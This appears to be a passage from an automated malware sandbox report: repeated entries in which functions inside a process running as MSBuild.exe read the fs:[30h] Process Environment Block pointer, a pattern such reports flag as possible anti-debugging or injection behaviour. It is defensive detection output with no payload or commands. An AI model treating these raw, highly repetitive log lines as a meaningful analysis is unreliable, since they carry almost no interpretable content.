                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01412349 mov eax, dword ptr fs:[00000030h]9_2_01412349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0146634F mov eax, dword ptr fs:[00000030h]9_2_0146634F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01438350 mov ecx, dword ptr fs:[00000030h]9_2_01438350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0145A352 mov eax, dword ptr fs:[00000030h]9_2_0145A352
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141035C mov eax, dword ptr fs:[00000030h]9_2_0141035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141035C mov eax, dword ptr fs:[00000030h]9_2_0141035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141035C mov eax, dword ptr fs:[00000030h]9_2_0141035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141035C mov ecx, dword ptr fs:[00000030h]9_2_0141035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141035C mov eax, dword ptr fs:[00000030h]9_2_0141035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141035C mov eax, dword ptr fs:[00000030h]9_2_0141035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138C310 mov ecx, dword ptr fs:[00000030h]9_2_0138C310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B0310 mov ecx, dword ptr fs:[00000030h]9_2_013B0310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA30B mov eax, dword ptr fs:[00000030h]9_2_013CA30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA30B mov eax, dword ptr fs:[00000030h]9_2_013CA30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA30B mov eax, dword ptr fs:[00000030h]9_2_013CA30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143437C mov eax, dword ptr fs:[00000030h]9_2_0143437C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01468324 mov eax, dword ptr fs:[00000030h]9_2_01468324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01468324 mov ecx, dword ptr fs:[00000030h]9_2_01468324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01468324 mov eax, dword ptr fs:[00000030h]9_2_01468324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01468324 mov eax, dword ptr fs:[00000030h]9_2_01468324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014163C0 mov eax, dword ptr fs:[00000030h]9_2_014163C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144C3CD mov eax, dword ptr fs:[00000030h]9_2_0144C3CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014343D4 mov eax, dword ptr fs:[00000030h]9_2_014343D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014343D4 mov eax, dword ptr fs:[00000030h]9_2_014343D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E3DB mov eax, dword ptr fs:[00000030h]9_2_0143E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E3DB mov eax, dword ptr fs:[00000030h]9_2_0143E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E3DB mov ecx, dword ptr fs:[00000030h]9_2_0143E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E3DB mov eax, dword ptr fs:[00000030h]9_2_0143E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01388397 mov eax, dword ptr fs:[00000030h]9_2_01388397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01388397 mov eax, dword ptr fs:[00000030h]9_2_01388397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01388397 mov eax, dword ptr fs:[00000030h]9_2_01388397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138E388 mov eax, dword ptr fs:[00000030h]9_2_0138E388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138E388 mov eax, dword ptr fs:[00000030h]9_2_0138E388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138E388 mov eax, dword ptr fs:[00000030h]9_2_0138E388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B438F mov eax, dword ptr fs:[00000030h]9_2_013B438F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B438F mov eax, dword ptr fs:[00000030h]9_2_013B438F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C63FF mov eax, dword ptr fs:[00000030h]9_2_013C63FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AE3F0 mov eax, dword ptr fs:[00000030h]9_2_013AE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AE3F0 mov eax, dword ptr fs:[00000030h]9_2_013AE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AE3F0 mov eax, dword ptr fs:[00000030h]9_2_013AE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A03E9 mov eax, dword ptr fs:[00000030h]9_2_013A03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A03E9 mov eax, dword ptr fs:[00000030h]9_2_013A03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A03E9 mov eax, dword ptr fs:[00000030h]9_2_013A03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A03E9 mov eax, dword ptr fs:[00000030h]9_2_013A03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A03E9 mov eax, dword ptr fs:[00000030h]9_2_013A03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A03E9 mov eax, dword ptr fs:[00000030h]9_2_013A03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A03E9 mov eax, dword ptr fs:[00000030h]9_2_013A03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A03E9 mov eax, dword ptr fs:[00000030h]9_2_013A03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A3C0 mov eax, dword ptr fs:[00000030h]9_2_0139A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A3C0 mov eax, dword ptr fs:[00000030h]9_2_0139A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A3C0 mov eax, dword ptr fs:[00000030h]9_2_0139A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A3C0 mov eax, dword ptr fs:[00000030h]9_2_0139A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A3C0 mov eax, dword ptr fs:[00000030h]9_2_0139A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A3C0 mov eax, dword ptr fs:[00000030h]9_2_0139A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013983C0 mov eax, dword ptr fs:[00000030h]9_2_013983C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013983C0 mov eax, dword ptr fs:[00000030h]9_2_013983C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013983C0 mov eax, dword ptr fs:[00000030h]9_2_013983C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013983C0 mov eax, dword ptr fs:[00000030h]9_2_013983C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01418243 mov eax, dword ptr fs:[00000030h]9_2_01418243
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01418243 mov ecx, dword ptr fs:[00000030h]9_2_01418243
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138823B mov eax, dword ptr fs:[00000030h]9_2_0138823B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144A250 mov eax, dword ptr fs:[00000030h]9_2_0144A250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144A250 mov eax, dword ptr fs:[00000030h]9_2_0144A250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0146625D mov eax, dword ptr fs:[00000030h]9_2_0146625D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01440274 mov eax, dword ptr fs:[00000030h]9_2_01440274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138826B mov eax, dword ptr fs:[00000030h]9_2_0138826B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01394260 mov eax, dword ptr fs:[00000030h]9_2_01394260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01394260 mov eax, dword ptr fs:[00000030h]9_2_01394260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01394260 mov eax, dword ptr fs:[00000030h]9_2_01394260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396259 mov eax, dword ptr fs:[00000030h]9_2_01396259
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138A250 mov eax, dword ptr fs:[00000030h]9_2_0138A250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014662D6 mov eax, dword ptr fs:[00000030h]9_2_014662D6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A02A0 mov eax, dword ptr fs:[00000030h]9_2_013A02A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A02A0 mov eax, dword ptr fs:[00000030h]9_2_013A02A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE284 mov eax, dword ptr fs:[00000030h]9_2_013CE284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE284 mov eax, dword ptr fs:[00000030h]9_2_013CE284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01410283 mov eax, dword ptr fs:[00000030h]9_2_01410283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01410283 mov eax, dword ptr fs:[00000030h]9_2_01410283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01410283 mov eax, dword ptr fs:[00000030h]9_2_01410283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A02E1 mov eax, dword ptr fs:[00000030h]9_2_013A02E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A02E1 mov eax, dword ptr fs:[00000030h]9_2_013A02E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A02E1 mov eax, dword ptr fs:[00000030h]9_2_013A02E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014262A0 mov eax, dword ptr fs:[00000030h]9_2_014262A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014262A0 mov ecx, dword ptr fs:[00000030h]9_2_014262A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014262A0 mov eax, dword ptr fs:[00000030h]9_2_014262A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014262A0 mov eax, dword ptr fs:[00000030h]9_2_014262A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014262A0 mov eax, dword ptr fs:[00000030h]9_2_014262A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014262A0 mov eax, dword ptr fs:[00000030h]9_2_014262A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A2C3 mov eax, dword ptr fs:[00000030h]9_2_0139A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A2C3 mov eax, dword ptr fs:[00000030h]9_2_0139A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A2C3 mov eax, dword ptr fs:[00000030h]9_2_0139A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A2C3 mov eax, dword ptr fs:[00000030h]9_2_0139A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139A2C3 mov eax, dword ptr fs:[00000030h]9_2_0139A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE53E mov eax, dword ptr fs:[00000030h]9_2_013BE53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE53E mov eax, dword ptr fs:[00000030h]9_2_013BE53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE53E mov eax, dword ptr fs:[00000030h]9_2_013BE53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE53E mov eax, dword ptr fs:[00000030h]9_2_013BE53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE53E mov eax, dword ptr fs:[00000030h]9_2_013BE53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0535 mov eax, dword ptr fs:[00000030h]9_2_013A0535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0535 mov eax, dword ptr fs:[00000030h]9_2_013A0535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0535 mov eax, dword ptr fs:[00000030h]9_2_013A0535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0535 mov eax, dword ptr fs:[00000030h]9_2_013A0535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0535 mov eax, dword ptr fs:[00000030h]9_2_013A0535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0535 mov eax, dword ptr fs:[00000030h]9_2_013A0535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01426500 mov eax, dword ptr fs:[00000030h]9_2_01426500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464500 mov eax, dword ptr fs:[00000030h]9_2_01464500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464500 mov eax, dword ptr fs:[00000030h]9_2_01464500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464500 mov eax, dword ptr fs:[00000030h]9_2_01464500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464500 mov eax, dword ptr fs:[00000030h]9_2_01464500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464500 mov eax, dword ptr fs:[00000030h]9_2_01464500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464500 mov eax, dword ptr fs:[00000030h]9_2_01464500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464500 mov eax, dword ptr fs:[00000030h]9_2_01464500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C656A mov eax, dword ptr fs:[00000030h]9_2_013C656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C656A mov eax, dword ptr fs:[00000030h]9_2_013C656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C656A mov eax, dword ptr fs:[00000030h]9_2_013C656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01398550 mov eax, dword ptr fs:[00000030h]9_2_01398550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01398550 mov eax, dword ptr fs:[00000030h]9_2_01398550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B45B1 mov eax, dword ptr fs:[00000030h]9_2_013B45B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B45B1 mov eax, dword ptr fs:[00000030h]9_2_013B45B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE59C mov eax, dword ptr fs:[00000030h]9_2_013CE59C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C4588 mov eax, dword ptr fs:[00000030h]9_2_013C4588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01392582 mov eax, dword ptr fs:[00000030h]9_2_01392582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01392582 mov ecx, dword ptr fs:[00000030h]9_2_01392582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CC5ED mov eax, dword ptr fs:[00000030h]9_2_013CC5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CC5ED mov eax, dword ptr fs:[00000030h]9_2_013CC5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013925E0 mov eax, dword ptr fs:[00000030h]9_2_013925E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE5E7 mov eax, dword ptr fs:[00000030h]9_2_013BE5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE5E7 mov eax, dword ptr fs:[00000030h]9_2_013BE5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE5E7 mov eax, dword ptr fs:[00000030h]9_2_013BE5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE5E7 mov eax, dword ptr fs:[00000030h]9_2_013BE5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE5E7 mov eax, dword ptr fs:[00000030h]9_2_013BE5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE5E7 mov eax, dword ptr fs:[00000030h]9_2_013BE5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE5E7 mov eax, dword ptr fs:[00000030h]9_2_013BE5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BE5E7 mov eax, dword ptr fs:[00000030h]9_2_013BE5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014105A7 mov eax, dword ptr fs:[00000030h]9_2_014105A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014105A7 mov eax, dword ptr fs:[00000030h]9_2_014105A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014105A7 mov eax, dword ptr fs:[00000030h]9_2_014105A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013965D0 mov eax, dword ptr fs:[00000030h]9_2_013965D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA5D0 mov eax, dword ptr fs:[00000030h]9_2_013CA5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CA5D0 mov eax, dword ptr fs:[00000030h]9_2_013CA5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE5CF mov eax, dword ptr fs:[00000030h]9_2_013CE5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CE5CF mov eax, dword ptr fs:[00000030h]9_2_013CE5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144A456 mov eax, dword ptr fs:[00000030h]9_2_0144A456
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138E420 mov eax, dword ptr fs:[00000030h]9_2_0138E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138E420 mov eax, dword ptr fs:[00000030h]9_2_0138E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138E420 mov eax, dword ptr fs:[00000030h]9_2_0138E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138C427 mov eax, dword ptr fs:[00000030h]9_2_0138C427
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141C460 mov ecx, dword ptr fs:[00000030h]9_2_0141C460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C8402 mov eax, dword ptr fs:[00000030h]9_2_013C8402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C8402 mov eax, dword ptr fs:[00000030h]9_2_013C8402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C8402 mov eax, dword ptr fs:[00000030h]9_2_013C8402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BA470 mov eax, dword ptr fs:[00000030h]9_2_013BA470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BA470 mov eax, dword ptr fs:[00000030h]9_2_013BA470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BA470 mov eax, dword ptr fs:[00000030h]9_2_013BA470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B245A mov eax, dword ptr fs:[00000030h]9_2_013B245A
